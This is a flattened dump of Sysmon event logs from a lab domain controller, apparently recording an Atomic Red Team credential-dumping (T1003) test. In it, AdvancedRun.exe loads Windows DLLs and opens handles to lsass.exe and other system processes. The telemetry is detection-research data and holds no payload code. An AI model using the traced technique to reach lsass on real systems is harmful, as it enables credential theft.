run.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943765Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.121{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943764Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.121{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943763Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.121{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943762Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.121{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003943761Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.121{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003943760Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.121{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943759Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.121{834264DD-DAE4-61EA-0C00-000000002702}652104C:\Windows\system32\lsass.exe{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003943758Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.121{834264DD-DAE4-61EA-0C00-000000002702}652104C:\Windows\system32\lsass.exe{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003943757Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.121{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943756Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.121{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943755Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943754Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943753Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943752Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943751Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943750Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943749Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943748Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943747Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943746Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943745Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943744Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943743Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943742Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943741Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943740Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943739Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943738Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943737Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943736Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943735Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943734Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943733Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943732Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 